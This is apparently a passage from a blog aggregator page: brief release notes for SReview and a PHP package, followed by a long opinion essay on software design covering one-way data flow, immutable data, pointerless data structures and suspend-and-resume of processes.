Anyway, I'm still finishing the API, and the implementation of that API and the test suite that ensures the API works correctly, but progress is happening; and as soon as things seem to be working properly, I'll do a release of SReview 0.6, and will upload that to Debian.

Hopefully that'll be soon.

June 01, 2020

I created a PHP package that can make it easier to work with percentages in any PHP application.

May 28, 2020

The reason software isn't better is because it takes a lifetime to understand how much of a mess we've made of things, and by the time you get there, you will have contributed significantly to the problem.
Two software developers pairing up on a Rails app

The fastest code is code that doesn't need to run, and the best code is code you don't need to write. This is rather obvious. Less obvious is how to get there, or who knows. Every coder has their favored framework or language, their favored patterns and practices. Advice on what to do is easy to find. More rare is what not to do. They'll often say "don't use X, because of Y," but that's not so much advice as it is a specific criticism.

The topic interests me because significant feats of software engineering often don't seem to revolve around new ways of doing things. Rather, they involve old ways of not doing things. Constraining your options as a software developer often enables you to reach higher than if you hadn't.

Many of these lessons are hard learned, and in retrospect often come from having tried to push an approach further than it merited. Some days much of software feels like this, as if computing has already been pushing our human faculties well past the collective red line. Hence I find the best software advice is often not about code at all. If it's about anything, it's about data, and how you organize it throughout its lifecycle. That is the real currency of the coder's world.

Usually data is the ugly duckling, relegated to the role of an unlabeled arrow on a diagram. The main star is all the code that we will write, which we draw boxes around. But I prefer to give data top billing, both here and in general.

One-way Data Flow

In UI, there's the concept of one-way data flow, popularized by the now omnipresent React. One-way data flow is all about what it isn't, namely not two-way. This translates into benefits for the developer, who can reason more simply about their code. Unlike traditional Model-View-Controller architectures, React is sold as being just the View.

Expert readers however will note that the original trinity of Model-View-Controller does all flow one way, in theory. Its View receives changes from the Model and updates itself. The View never talks back to the model, it only operates through the Controller.

model view controller

The reason it's often two-way in practice is because there are lots of M's, V's and C's which all need to communicate and synchronize in some unspecified way:

model view controller - data flow

The source of truth is some kind of nebulous Ur-Model, and each widget in the UI is tied to a specific part of it. Each widget has its own local model, which has to bi-directionally sync up to it. Children go through their parent to reach up to the top.

When you flatten this, it starts to look more like this:

model view controller - 2-way data flow

Between an original model and a final view must sit a series of additional "Model Controllers" whose job it is to pass data down and to the right, and vice versa. Changes can be made in either direction, and there is no single source of truth. If both sides change at the same time, you don't know which is correct without more information. This is what makes it two-way.

model view controller - one-way stateless data flow

The innovation in one-way UI isn't exactly to remove the Controller, but to centralize it and call it a Reducer. It also tends to be stateless, in that it replaces the entire Model for every change, rather than updating it in place.

This makes all the intermediate arrows one-way, restoring the original idea behind MVC. But unlike most MVC, it uses a stateless function f: model => views to derive all the Views from the Ur-Model in one go. There are no permanent Views that are created and then set up to listen to an associated Model. Instead Views are pure data, re-derived for every change, at least conceptually.

In practice there is an actual trick to making this fast, namely incrementalism and the React Reconciler. You don't re-run everything, but you can pretend you do. A child is guaranteed to be called again if a parent has changed. But only after giving that parent, and its parents, a chance to react first.

Even if the Views are a complex nested tree, the data flow is entirely one way except at the one point where it loops back to the start. If done right, you can often shrink the controller/reducer to such a degree that it may as well not be there.

Much of the effort in developing UI is not in the widgets but in the logic around them, so this can save a lot of time. Typical MVC instead tends to spread synchronization concerns all over the place as the UI develops, somewhat like a slow but steadily growing cancer.

The solution seems to be to forbid a child from calling or changing the state of its parent directly. Many common patterns in old UI code become impossible and must be replaced with alternatives. Parents do often pass down callbacks to children to achieve the same thing by another name. But this is a cleaner split, because the child component doesn't know who it's calling. The parent can decide to pass-through or decorate a callback given to it by its parent, and this enables all sorts of fun composition patterns with little to no boilerplate.

You don't actually need to have one absolute Ur-Model. Rather the idea is separation of concerns along lines of where the data comes from and what it is going to be used for, all to ensure that change only flows in one direction.

The benefits are numerous because of what it enables: when you don't mutate state bidirectionally, your UI tree is also a data-dependency graph. This can be used to update the UI for you, requiring you to only declare what you want the end result to be. You don't need to orchestrate specific changes to and fro, which means a lot of state machines disappear from your code. Key here is the ability to efficiently check for changes, which is usually done using immutable data.

The merit of this approach is most obvious once you've successfully built a complex UI with it. The discipline it enforces leads to more elegant and robust solutions, because it doesn't let you wire things up lazily. You must instead take the long way around, and design a source of truth in accordance with all its intended derivatives. This forces but also enables you to see the bigger picture. Suddenly features that seemed insurmountably complicated, because they cross-cut too many concerns, can just fall out naturally. The experience is very similar to Immediate Mode UI, only with the ability to decouple more and do async.

If you don't do this, you end up with the typical Object-Oriented system. Every object can be both an actor and can be mutually acted upon. It is normal and encouraged to create two-way interactions with them and link them into cycles. The resulting architecture diagrams will be full of unspecified bidirectional arrows that are difficult to trace, which obscure the actual flows being realized.

Unless they represent a reliable syncing protocol, bidirectional arrows are wishful thinking.

Immutable Data

Almost all data in a computer is stored on a mutable medium, be it a drive or RAM. As such, most introductions to immutable data will preface it by saying that it's kinda weird. Because once you create a piece of data, you never update it. You only make a new, altered copy. This seems like a waste of perfectly good storage, volatile or not, and contradicts every programming tutorial.

Because of this it is mandatory to say that you can reduce the impact of it with data sharing. This produces a supposedly unintuitive copy-on-write system.

But there's a perfect parallel, and that's the pre-digital office. Back then, most information was kept on paper that was written, typed or printed. If a document had to be updated, it had to be amended or redone from scratch. Aside from very minor annotations or in-place corrections, changes were not possible. When you did redo a document, the old copy was either archived, or thrown away.

data sharing - copy on write

The perfectly mutable medium of computer memory is a blip, geologically speaking. It's easy to think it only has upsides, because it lets us recover freely from mistakes. Or so we think. But the same needs that gave us real life bureaucracy re-appear in digital form. Only it's much harder to re-introduce what came naturally offline.

Instead of thinking of mutable data as the default, I prefer to think of it as data that destroys its own paper trail. It shreds any evidence of the change and adjusts the scene of the crime so the past never happened. All edits are applied atomically, with zero allowances for delay, consideration, error or ambiguity. This transactional view of interacting with data is certainly appealing to systems administrators and high-performance fetishists, but it is a poor match for how people work with data in real life. We enter and update it incrementally, make adjustments and mistakes, and need to keep the drafts safe too. We need to sync between devices and across a night of sleep.

banksy self-shredding painting

Girl With Balloon aka The Self-shredding Painting (Banksy)

Storing your main project in a bunch of silicon that loses its state as soon as you turn off the power is inadvisable. This is why we have automated backups. Apple's Time Machine for instance turns your computer into a semi-immutable data store on a human time scale, garbage collected behind the scenes and after the fact. Past revisions of files are retained for as long is practical, provided the app supports revision control. It even works without the backup drive actually hooked up, as it maintains a local cache of the most recent edits as space permits.

It's a significant feat of engineering, supported by a clever reinterpretation of what "free disk space" actually means. It allows you to Think Different™ about how data works on your computer. It doesn't just give you the peace of mind of short-term OS-wide undo. It means you can still go fish a crumpled piece of data out of the trash long after throwing banana peels and coke cans on top. And you can do it inline, inside the app you're using, using a UI that is only slightly over the top for what it does.

That is what immutable data gets you as an end-user, and it's the result of deciding not to mutate everything in place as if empty disk space is a precious commodity. The benefits can be enormous, for example that synchronization problems get turned into fetching problems. This is called a Git.

It's so good most developers would riot if they were forced to work without it, but almost none grant their own creations the same abilities.

Linus Torvalds

Git repositories are of course notorious for only growing bigger, never shrinking, but that is a long-standing bug if we're really honest. It seems pretty utopian to want a seamless universe of data, perfectly normalized by key in perpetuity, whether mutable or immutable. Falsehoods programmers believe about X is never wrong on a long enough time-scale, and you will need affordances to cushion that inevitable blow sooner or later.

One of those falsehoods is that when you link a piece of data from somewhere else, you always wish to keep that link live instead of snapshotting it, better known as Database Normalization. Given that screenshots of screenshots are now the most common type of picture on the web, aside from cats, we all know that's a lie. Old bills don't actually self-update after you move house. In fact if you squint hard "Print to PDF" looks a lot like compiling source code into a binary for normies, used for much the same reasons.

The analogy to a piece of paper is poignant to me, because you certainly feel it when you try to actually live off SaaS software meant to replicate business processes. Working with spreadsheets and PDFs on my own desktop is easier and faster than trying to use an average business solution designed for that purpose in the current year. Because they built a tool for what they thought people do, instead of what we actually do.

These apps often have immutability, but they use it wrong: they prevent you from changing something as a matter of policy, letting workflow concerns take precedence over an executive override. If e.g. law requires a paper trail, past versions can be archived. But they should let you continue to edit as much as you damn well want, saving in the background if appropriate. The exceptions that get this right can probably be counted on one hand.

Business processes are meant to enable business, not constrain it. Requiring that you only ever have one version of everything at any time does exactly that. Immutability with history is often a better solution, though not a miracle cure. Doing it well requires expert skill in drawing boundaries between your immutable blobs. It also creates a garbage problem and it won't be as fast as mutable in the short term. But in the long term it just might save someone a rewrite. It's rarely pretty when real world constraints collide with an ivory tower that had too many false assumptions baked into it.

Rolls containing Acts of Parliament in the Parliamentary Archives at Victoria Tower, Palace of Westminster

Parliamentary Archives at Victoria Tower – Palace of Westminster

Pointerless Data

Data structures in a systems language like C will usually refer to each other using memory pointers: these are raw 64-bit addresses pointing into the local machine's memory, obscured by virtualization. They reference memory pages that are allocated, with their specific numeric value meaningless and unpredictable.

This has a curious consequence: the most common form of working with data on a computer is one of the least useful encodings of that data imaginable. It cannot be used as-is on any other machine, or even the same machine later, unless loaded at exactly the same memory offset in the exact same environment.

Almost anything else, even in an obscure format, would have more general utility. Serializing and deserializing binary data is hence a major thing, which includes having to "fix" all the pointers, a problem that has generated at least 573 kiloyaks worth of shaving. This is strange because the solution is literally just adding or subtracting a number from a bunch of other numbers over and over.

Okay that's a lie. But what's true is that every pointer p in a linked data structure is really a base + i, with a base address that was determined once and won't change. Using pointers in your data structure means you sprinkle base + invisibly around your code and your data. You bake this value into countless repeated memory cells, which you then have to subtract later if you want to use their contents for outside purposes.

Due to dynamic memory allocation the base can vary for different parts of your linked data structure. You have to assume it's different per pointer, and manually collate and defragment all the individual parts to serialize something.

Pointers are popular because they are easy, they let you forget where exactly in memory your data sits. This is also their downside: not only have you encoded your data in the least repeatable form possible, but you put it where you don't have permission to search through all of it, add to it, or reorganize it. malloc doesn't set you free, it binds you.

But that's a design choice. If you work inside one contiguous memory space, you can replace pointers with just the relative offset i. The resulting data can be snapshotted as a whole and written to disk. In addition to pointerless, certain data structures can even be made offsetless.

For example, a flattened binary tree where the index of a node in a list determines its position in the tree, row by row. Children are found at 2*i and 2*i + 1. This can be e.g. used on GPUs and allows for very efficient traversal and updates. It's also CPU-cache friendly. This doesn't work well for arbitrary graphs, but is still a useful trick to have in your toolbox. In specific settings, pointerless or offsetless data structures can have significant benefits. The fact that it lets you treat data like data again, and just cargo it around wholesale without concern about the minutiae, enables a bunch of other options around it.

Binary Tree - Flattened

It's not a silver bullet because going pointerless can just shift the problem around in the real world. Your relative offsets can still have the same issue as before, because your actual problem was wrangling the data-graph itself. That is, all the bookkeeping of dependent changes when you edit, delete or reallocate. Unless you can tolerate arbitrary memory fragmentation and bloating, it's going to be a big hassle to make it all work well.

Something else is going on beyond just pointers. See, most data structures aren't really data structures at all. They're acceleration structures for data. They accelerate storage, querying and manipulation of data that was already shaped in a certain way.

The contents of a linked list are the same as that of a linear array, and they serialize to the exact same result. A linked list is just an array that has been atomized, tagged and sprayed across an undefined memory space when it was built or loaded.

Because of performance, we tend to use our acceleration structures as a stand-in for the original data, and manipulate that. But it's important to realize this is programmer lazyness: it's only justified if all the code that needs to use that data has the same needs. For example, if one piece of code does insertions, but another needs random access, then neither an array nor linked list would win, and you need something else.

We can try to come up with ever-cleverer data structures to accommodate every imaginable use, and this is called a Postgres. It leads to a ritual called a Schema Design Meeting where a group of people with differently shaped pegs decide what shape the hole should be. Often you end up with a too-generic model that doesn't hold anything particularly well. All you needed was 1 linked list and 1 array containing the exact same data, and a function to convert one to the other, that you use maybe once or twice.

When a developer is having trouble maintaining consistency while coding data manipulations, that's usually because they're actually trying to update something that is both a source of truth and output derived from it, at the same time in the same place. Most of the time this is entirely avoidable. When you do need to do it, it is important to be aware that's what that is.

My advice is to not look for the perfect data structure which kills all birds with one stone, because this is called a Lisp and few people use it. Rather, accept the true meaning of diversity in software: you will have to wrangle different and incompatible approaches, transforming your data depending on context. You will need to rely on well-constructed adaptors that exist to allow one part to forget about most of the rest of the universe. It is best to become good at this and embrace it where you can.

As for handing your data to others, there is already a solution for that. They're called file formats, and they're a thing we used to have. Software used to be able to read many of them, and you could just combine any two tools that had the same ones. Without having to pay a subscription fee for the privilege, or use a bespoke one-time-use convertor. Obviously this was crazy.

These days we prefer to link our data and code using URLs, which is much better because web pages can change invisibly underneath you without any warning. You also can't get the old version back even if you liked it more or really needed it, because browsers have chronic amnesia. Unfortunately it upsets publishers and other copyright holders if anyone tries to change that, so we don't try.

squeak / smalltalk


Suspend and Resume

When you do have snapshottable data structures that can be copied in and out of memory wholesale, it leads to another question: can entire programs be made to work this way? Could they be suspended and resumed mid-operation, even transplanted or copied to another machine? Imagine if instead of a screenshot, a tester could send a process snapshot that can actually be resumed and inspected by a developer. Why did it ever only 'work on my machine'?

Obviously virtual machines exist, and so does wholesale-VM debugging. But on the process level, it's generally a non-starter, because sockets and files and drivers mess it up. External resources won't be tracked while suspended and will likely end up in an invalid state on resume. VMs have well-defined boundaries and well-defined hardware to emulate, whereas operating systems are a complete wild west.

It's worth considering the worth of a paper trail here too. If I suspend a program while a socket is open, and then resume it, what does this actually mean? If it was a one-time request, like an HTTP GET or PUT, I will probably want to retry that request, if at all still relevant. Maybe I prefer to drop it as unimportant and make a newer, different request. If it was an ongoing connection like a WebSocket, I will want to re-establish it. Which is to say, if you told a network layer the reason for opening a socket, maybe it could safely abort and resume sockets for you, subject to one of several policies, and network programming could actually become pleasant.

Files can receive a similar treatment, to deal with the situation where they may have changed, been deleted, moved, etc. Knowing why a file was opened or being written to is required to do this right, and depends on the specific task being accomplished. Here too macOS deserves a shout-out, for being clever enough to realize that if a user moves a file, any application editing that file should switch to the new location as well.

Systems-level programmers tend to orchestrate such things by hand when needed, but the data flow in many cases is quite unidirectional. If a process, or a part of a process, could resume and reconnect with its resources according to prior declared intent, it would make a lot of state machines disappear.

It's not a coincidence this post started with React. Even those aware of it still don't quite realize React is not actually a thing to make web apps. It is an incremental job scheduler, for recursively expanding a tree in an asynchronous and rewindable fashion. It just happens to be built for SGML-like trees, and contains a bunch of legacy fixes for browsers. The pattern can be applied to many areas that are not UI and not web. If it sounds daunting to consider approaching resources this way, consider that people thought exactly the same about async I/O until someone made that pleasant enough.

However, doing this properly will probably require going back further than you think. For example, when you re-establish a socket, should you repeat and confirm the DNS lookup that gave you the IP in the first place? Maybe the user moved locations between suspending and resuming, so you want to reconnect to the nearest data center. Maybe there is no longer a need for the socket because the user went offline.

All of this is contextual, defined by policies informed by the real world. This class of software behavior is properly called etiquette. Like its real world counterpart it is extremely messy because it involves anticipating needs. Usually we only get it approximately right through a series of ad-hoc hacks to patch the worst annoyances. But it is eminently felt when you get such edge cases to work in a generic and reproducible fashion.

Mainly it requires treating policies as first class citizens in your designs and code. This can also lead you to perceive types in code in a different way. A common view is that a type constrains any code that refers to it. That is, types ensure your code only applies valid operations on the represented values. When types represent policies though, the perspective changes because such a type's purpose is not to constrain the code using it. Rather, it provides specific guarantees about the rules of the universe in which that code will be run.

This to me is the key to developer happiness. As opposed to, say, making tools to automate the refactoring of terrible code and make it bearable, but only just.

The key to end-user happiness is to make tools that enable an equivalent level of affordance and flexibility compared to what the developer needed while developing it.

* * *

When you look at code from a data-centric view, a lot of things start to look like stale or inconsistent data problems. I don't like using the word "cache" for this because it focuses on the negative, the absence of fresh input. The real issue is data dependencies, which are connections that must be maintained in order to present a cohesive view and cohesive behavior, derived from a changing input model. Which is still the most practical way of using a computer.

Most caching strategies, including 99% of those in HTTP, are entirely wrong. They fall into the give-up-and-pray category, where they assume the problem is intractable and don't try something that could actually work in all cases. Which, stating the obvious, is what you should actually aim for.

Often the real problem is that the architect's view of the problem is a tangled mess of boxes and arrows that point all over the place, with loopbacks and reversals, which makes it near-impossible to anticipate and cover all the applicable scenarios.

If there is one major thread running through this, it's that many currently accepted sane defaults really shouldn't be. In a world of terabyte laptops and gigabyte GPUs they look suspiciously like premature optimization. Many common assumptions deserve to be re-examined, at least if we want to adapt tools like from the Offline Age to a networked day. We really don't need a glossier version of a Microsoft Office 95 wizard with a less useful file system.

We do need optimized code in our critical paths, but developer time is worth more than CPU time most everywhere else. Most of all, we need the ambition to build complete tools and the humility to grant our users access on an equal footing, instead of hoarding the goods.

The argument against these practices is usually that they lead to bloat and inefficiency. Which is definitely true. Yet even though our industry has not adopted them much at all, the software already comes out orders of magnitude bigger and slower than before. Would it really be worse?